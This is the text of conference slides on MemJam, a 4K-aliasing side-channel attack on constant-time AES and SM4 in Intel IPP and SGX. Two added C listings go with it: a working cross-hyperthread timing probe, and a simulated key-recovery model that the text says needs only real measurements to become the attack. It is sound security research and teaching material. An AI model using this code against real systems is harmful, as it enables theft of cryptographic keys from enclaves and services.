#RSAC SESSION ID: CRYP-T07
MemJam: A False Dependency Attack against Constant-Time Crypto Implementations in SGX
Daniel Moghimi, Ph.D. Student, Worcester Polytechnic Institute, @danielmgmi

MemJam: A False Dependency Attack against Constant-Time Crypto Implementations in SGX
Ahmad "Daniel" Moghimi, Thomas Eisenbarth, Berk Sunar
April 17, 2018, CT-RSA 2018, San Francisco, CA
Data Dependency
• Data dependency: an instruction consumes data produced by a preceding instruction.
  1 add %ebx, %eax
  2 sub %eax, %edx      (reads the %eax written by 1)
  3 xor %ecx, %ecx
  4 add %eax, %edi      (reads the %eax written by 1)
  5 sub %ecx, %edi      (reads the %ecx written by 3 and the %edi written by 4)

Data Dependency, Pipelined Execution
• Pipeline stages: IF (Instruction Fetch), ID (Instruction Decode), EX (Execute), WB (Write Back).
• The slide animation steps the five instructions through the pipeline one cycle at a time:
                        cycle:  1   2   3   4   5   6   7
  1 add %ebx, %eax              IF  ID  EX  WB
  2 sub %eax, %edx                  IF  ID  EX  EX  WB
  3 xor %ecx, %ecx                      IF  ID  ID  EX  WB
  ...
• Instruction 2 repeats its EX stage (a stall) until the %eax result of instruction 1 is written back; the instructions behind it wait as well.
Data False Dependency
• The pipeline stalls even though there is no true (read-after-write) dependency.
• Reasons: register reuse; limited address space (a small set of architectural register names).
  1 add %ebx, %eax
  2 xor %ecx, %ecx
  3 sub %eax, %edx
  4 mov $100, %edx      FD: overwrites the %edx that 3 is still reading (write-after-read)
  5 sub %edx, %ecx      reads the %edx written by 4

Data False Dependency, Register Renaming
• Register renaming removes the false dependency: instruction 4 is given a fresh physical register (shown as %bat on the slide) and instruction 5 reads from that register, so 4 no longer has to wait for 3.
  1 add %ebx, %eax          1 add %ebx, %eax
  2 xor %ecx, %ecx          2 xor %ecx, %ecx
  3 sub %eax, %edx    -->   3 sub %eax, %edx
  4 mov $100, %edx          4 mov $100, %bat
  5 sub %edx, %ecx          5 sub %bat, %ecx
Memory False Dependency, 4K Aliasing
• Memory loads and stores are executed out of order and speculatively; whether a load depends on an earlier store is verified only after execution (memory disambiguation).
  mov %eax, (%ebx)      store, executes
  mov (%ecx), %edx      load, executes; dependent on the store? checked afterwards
• 4K aliasing: while the virtual-to-physical address translation is still pending, the disambiguator compares only the low 12 bits, so addresses that are a multiple of 4K apart are assumed dependent.
• On such a false dependency the load and the instructions that consumed its result are re-executed, which costs time.
4K Aliasing, Hyperthreading
• Two hyperthreads (HT) of one core. Thread A executes and times a fixed sequence of loads (0xFECD1, 0xFECD2, ..., 0xFECD8 on the slide).
• Thread B concurrently issues a stream of stores; the experiment is repeated with different store addresses (0x12ABCDEF, 0x12ABC200, ...).
• When thread B's store address shares its low 12 bits with thread A's loads, the loads are falsely flagged as dependent and re-executed, and thread A's measured time rises; stores to other addresses leave it unchanged.
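The hyperthreading experiment above, as an added example that is not code from the talk: one process times a fixed run of loads while a second process (meant to sit on the sibling hyperthread) keeps storing to an address whose low 12 bits either match the loads (aliasing run) or do not (control run). The two processes have different virtual addresses, but bits 11:0 survive translation, which is all the disambiguator compares. The CPU ids are an assumption (they must be the two hyperthreads of one core, e.g. 0 and 4 on a 4-core/8-thread part) and are passed on the command line.

```c
/* Added example (not from the slides): 4K-aliasing timing probe across two
 * hyperthreads. Assumes Linux, gcc/clang, and that cpu_a/cpu_b are siblings. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define PAGE   4096u
#define NLOADS 8
#define ROUNDS 20000

/* 4K aliasing: the memory disambiguator only compares address bits 11:0. */
int aliases_4k(uintptr_t a, uintptr_t b) { return ((a ^ b) & (PAGE - 1)) == 0; }

/* Address inside the attacker's own two-page buffer that aliases `victim`:
 * keep the attacker's page, copy the victim's 12 low bits. */
uintptr_t alias_target(uintptr_t victim, uintptr_t attacker_buf) {
    uintptr_t t = (attacker_buf & ~(uintptr_t)(PAGE - 1)) | (victim & (PAGE - 1));
    return t < attacker_buf ? t + PAGE : t;
}

static inline uint64_t cycles(void) {
#if defined(__x86_64__) || defined(__i386__)
    unsigned lo, hi;                         /* serialised rdtsc */
    __asm__ __volatile__("lfence\n\trdtsc" : "=a"(lo), "=d"(hi) : : "memory");
    return ((uint64_t)hi << 32) | lo;
#else
    struct timespec ts;                      /* fallback: nanoseconds */
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
#endif
}

static void pin_to_cpu(int cpu) {
#if defined(__linux__) && defined(CPU_ZERO)
    cpu_set_t set; CPU_ZERO(&set); CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof set, &set);
#else
    (void)cpu;
#endif
}

static int cmp_u64(const void *x, const void *y) {
    uint64_t a = *(const uint64_t *)x, b = *(const uint64_t *)y;
    return (a > b) - (a < b);
}

static volatile uint8_t sink;

/* Time NLOADS loads from `victim` on cpu_a while a forked child on cpu_b
 * stores to `store_to` without pause. Returns the median over ROUNDS. */
uint64_t time_loads_under_stores(volatile uint8_t *victim, volatile uint8_t *store_to,
                                 int cpu_a, int cpu_b) {
    static uint64_t samples[ROUNDS];
    volatile int *stop = mmap(NULL, sizeof *stop, PROT_READ | PROT_WRITE,
                              MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (stop == MAP_FAILED) return 0;
    *stop = 0;
    pid_t child = fork();
    if (child == 0) {                        /* "thread B": hammer one address */
        pin_to_cpu(cpu_b);
        while (!*stop) *store_to = 1;
        _exit(0);
    }
    pin_to_cpu(cpu_a);                       /* "thread A": the timed loads */
    usleep(2000);
    for (int r = 0; r < ROUNDS; r++) {
        uint8_t acc = 0;
        uint64_t t0 = cycles();
        for (int i = 0; i < NLOADS; i++) acc ^= victim[i];
        samples[r] = cycles() - t0;
        sink = acc;
    }
    *stop = 1;
    waitpid(child, NULL, 0);
    munmap((void *)stop, sizeof *stop);
    qsort(samples, ROUNDS, sizeof samples[0], cmp_u64);
    return samples[ROUNDS / 2];
}

static uint8_t victim_page[PAGE]      __attribute__((aligned(4096)));
static uint8_t attacker_buf[2 * PAGE] __attribute__((aligned(4096)));

int main(int argc, char **argv) {
    int cpu_a = argc > 2 ? atoi(argv[1]) : 0;   /* assumed sibling hyperthreads */
    int cpu_b = argc > 2 ? atoi(argv[2]) : 1;
    volatile uint8_t *v = victim_page + 0xCD0;  /* loads at ...CD0 through ...CD7 */
    volatile uint8_t *hit = (volatile uint8_t *)alias_target((uintptr_t)v, (uintptr_t)attacker_buf);
    volatile uint8_t *miss = hit + 0x200;       /* same page, low 12 bits differ */
    printf("aliasing stores: median %llu\n",
           (unsigned long long)time_loads_under_stores(v, hit, cpu_a, cpu_b));
    printf("control stores:  median %llu\n",
           (unsigned long long)time_loads_under_stores(v, miss, cpu_a, cpu_b));
    return 0;
}
```

On an affected Intel core the aliasing run reports a noticeably higher median than the control run; on the wrong CPU pairing (two different physical cores) the two medians are close, which is a quick way to confirm the sibling assumption.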
MemJam, Intra-Cache-Line Resolution
• Address bits: the least-significant 12 bits are identical in the virtual and the physical address; the rest of the bits differ between the two.
• L1 cache attacks work on the low 12 bits (the L1 set index lies inside the page offset); L2/LLC cache attacks work on the rest of the bits.
• Timeline of cache attacks: 2005, Percival, Cache Missing for Fun and Profit; 2006, Osvik et al., Cache attacks; 2014, Yarom, Flush+Reload; 2015, Irazoqui, S$A.
• All of these resolve accesses at cache-line granularity. MemJam adds intra-cache-line leakage at 4-byte granularity: a higher time correlates memory accesses with the same address bits 3 to 12, which gives 4 bits of leakage inside the cache line (16 slots of 4 bytes in a 64-byte line).
MemJam Attack
• Setup: a CPU with several cores, each with two hyperthreads. The encryption service runs on one hyperthread; the attacker runs on the sibling hyperthread of the same core.
• The victim's execution is a sequence of loads and compute steps (load, compute, load, load, compute, load, ...).
• The attacker streams stores to an address that 4K-aliases a chosen 4-byte slot, lets the victim execute and measures its time, then executes it again for the next measurement.
• Higher time if there are more 4K conflicts: the number of victim loads that fall into the attacker's slot determines the slowdown.
Constant-time AES, Safe2Encrypt_RIJ128
• Scatter-gather implementation of AES: the 256-byte S-box occupies 4 cache lines (64 bytes each).
• Cache-independent access pattern: an S-box lookup reads the same offset from all 4 lines (A, B, C, D on the slide) into a local buffer and then selects the wanted byte (B in the slide's example), so every lookup touches all 4 lines.
• Implemented and distributed as part of Intel products: the Intel SGX Linux Software Development Kit (SDK) and the Intel IPP Cryptography Library.
MemJam Attack on AES
[Figure: the four 64-byte cache lines of the S-box, narrowing to a single line; the lookups whose offset inside the line falls into the attacker's 4-byte slot are the ones that conflict.]

AES Key Recovery
[Figure: key-recovery results; no data survives in the extracted text.]
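A model of the attack on the scatter-gather S-box described above, as an added example that is not code from the talk or from Intel IPP. The S-box layout follows the slide (four 64-byte lines, one read from each line per lookup, branch-free select), so the cache-line footprint is constant while address bits 2 to 5, the 4-byte slot inside the line, still depend on the index. The timing is simulated rather than measured: each trace is the number of first-round loads that 4K-alias the attacker's store address (bits 2 to 11 equal) plus constructed noise. The key is the FIPS-197 sample key, used only as a constructed secret; the attacker recovers bits 2 to 5 of every key byte (4 bits per byte, 64 of the 128 bits) from the first round by a difference-of-means test.

```c
/* Added example (not from the slides): scatter-gather S-box, the 4K-aliasing
 * leak it still has, and the 4-bit-per-byte first-round recovery. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ROTL8(x, s) ((uint8_t)(((x) << (s)) | ((x) >> (8 - (s)))))

static uint8_t sbox[256];
static uint8_t sg_table[4][64] __attribute__((aligned(64)));
static int tables_ready;

/* AES S-box from scratch: GF(2^8) inverse followed by the affine map;
 * then lay it out scatter-gather style: entry i -> line i>>6, offset i&63. */
void init_tables(void) {
    uint8_t p = 1, q = 1;
    if (tables_ready) return;
    do {
        p = (uint8_t)(p ^ (p << 1) ^ ((p & 0x80) ? 0x1B : 0));        /* p *= 3 */
        q ^= (uint8_t)(q << 1); q ^= (uint8_t)(q << 2); q ^= (uint8_t)(q << 4);
        q ^= (q & 0x80) ? 0x09 : 0;                                    /* q /= 3 */
        sbox[p] = (uint8_t)(q ^ ROTL8(q, 1) ^ ROTL8(q, 2) ^ ROTL8(q, 3) ^ ROTL8(q, 4) ^ 0x63);
    } while (p != 1);
    sbox[0] = 0x63;
    memcpy(sg_table, sbox, 256);
    tables_ready = 1;
}
uint8_t sbox_at(uint8_t i) { init_tables(); return sbox[i]; }

/* What the 4K-aliasing check sees at 4-byte granularity: address bits 2..11. */
unsigned alias_key(uintptr_t a) { return (unsigned)((a >> 2) & 0x3FF); }

/* Constant-cache-line-pattern lookup: read offset i&63 from all four lines,
 * select line i>>6 without a branch. `conflicts` counts the loads whose
 * bits 2..11 equal those of the attacker's store address. */
uint8_t sg_lookup(uint8_t i, uintptr_t attacker_store, unsigned *conflicts) {
    uint8_t off = i & 63, sel = i >> 6, r = 0;
    init_tables();
    for (unsigned l = 0; l < 4; l++) {
        const uint8_t *addr = &sg_table[l][off];
        if (alias_key((uintptr_t)addr) == alias_key(attacker_store)) (*conflicts)++;
        uint8_t eq = (uint8_t)((((uint32_t)(l ^ sel)) - 1u) >> 31);  /* 1 iff l == sel */
        r |= *addr & (uint8_t)(0u - eq);
    }
    return r;
}

/* Self-check: the scatter-gather lookup agrees with the flat S-box for all i. */
int sg_matches_sbox(void) {
    unsigned dummy = 0;
    for (unsigned i = 0; i < 256; i++)
        if (sg_lookup((uint8_t)i, 0, &dummy) != sbox_at((uint8_t)i)) return 0;
    return 1;
}

/* Victim: first-round SubBytes of pt ^ key. Returns the number of 4K
 * conflicts with the attacker's store, i.e. what MemJam observes as time. */
unsigned victim_first_round(const uint8_t pt[16], const uint8_t key[16], uintptr_t store) {
    unsigned conflicts = 0;
    for (int b = 0; b < 16; b++) (void)sg_lookup(pt[b] ^ key[b], store, &conflicts);
    return conflicts;
}

static uint32_t rng_state;                                  /* xorshift32, constructed */
static uint32_t rnd(void) { uint32_t x = rng_state; x ^= x << 13; x ^= x >> 17; x ^= x << 5; return rng_state = x; }

/* Attacker: store to 4-byte slot `slot` of line 0 (table address known from the
 * victim binary; only bits 2..11 matter), collect n traces with time =
 * conflicts + noise, and for each byte pick the key nibble (bits 2..5) whose
 * predicted hits have the highest mean time. recovered[b] = (key[b] >> 2) & 0xF. */
void memjam_recover_nibbles(const uint8_t key[16], unsigned slot, int n, uint8_t recovered[16]) {
    uintptr_t store = (uintptr_t)&sg_table[0][4 * slot];
    double sum1[16][16] = {{0}}, sum0[16][16] = {{0}};
    unsigned cnt1[16][16] = {{0}}, cnt0[16][16] = {{0}};
    init_tables();
    rng_state = 0x9E3779B9u;
    for (int t = 0; t < n; t++) {
        uint8_t pt[16];
        for (int b = 0; b < 16; b++) pt[b] = (uint8_t)rnd();
        double time = victim_first_round(pt, key, store) + (double)(rnd() % 4); /* noise 0..3 */
        for (int b = 0; b < 16; b++)
            for (unsigned g = 0; g < 16; g++) {
                if ((((pt[b] >> 2) & 0xF) ^ g) == slot) { sum1[b][g] += time; cnt1[b][g]++; }
                else                                     { sum0[b][g] += time; cnt0[b][g]++; }
            }
    }
    for (int b = 0; b < 16; b++) {
        double best = -1e9; recovered[b] = 0;
        for (unsigned g = 0; g < 16; g++) {
            if (!cnt1[b][g] || !cnt0[b][g]) continue;
            double d = sum1[b][g] / cnt1[b][g] - sum0[b][g] / cnt0[b][g];
            if (d > best) { best = d; recovered[b] = (uint8_t)g; }
        }
    }
}

static const uint8_t demo_key[16] = {0x2b,0x7e,0x15,0x16,0x28,0xae,0xd2,0xa6,0xab,0xf7,0x15,0x88,0x09,0xcf,0x4f,0x3c};

int demo_recovers_key(void) {
    uint8_t rec[16];
    memjam_recover_nibbles(demo_key, 5, 4000, rec);
    for (int b = 0; b < 16; b++) if (rec[b] != ((demo_key[b] >> 2) & 0xF)) return 0;
    return 1;
}

int main(void) {
    uint8_t rec[16];
    memjam_recover_nibbles(demo_key, 5, 4000, rec);
    for (int b = 0; b < 16; b++)
        printf("byte %2d: key bits 5..2 = %x, recovered = %x\n", b, (demo_key[b] >> 2) & 0xF, rec[b]);
    return 0;
}
```

The recovered nibbles are the 4 bits the slide counts as intra-cache-line leakage; the cache-line bits 6 and 7 of each index are exactly what the scatter-gather layout hides, so they, and the low two bits inside the 4-byte slot, need the further rounds and observations the talk's key-recovery figure refers to. Replacing the simulated `time` with a real measurement from the sibling hyperthread is the only change needed to turn the model into the attack.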
SM4 Block Cipher, cpSMS4_Cipher
• A standard cipher supported by Intel (IPP); the Chinese national standard for wireless LAN (WAPI).
• S-box plus an unbalanced Feistel structure.
• Protected by cache-state normalization, which hides the cache-line footprint but not the offset inside the line.
• Recursive attack: full key recovery with 40K observations.
MemJamming Intel SGX
• Same setup with the encryption service inside an Intel SGX enclave: the attacker runs on the sibling hyperthread of the enclave's core, lets the enclave execute, measures, and executes again.
• Higher time if there are more 4K conflicts. SGX isolates the enclave's memory, but the memory-disambiguation logic of the core is shared by both hyperthreads, so the same measurement applies.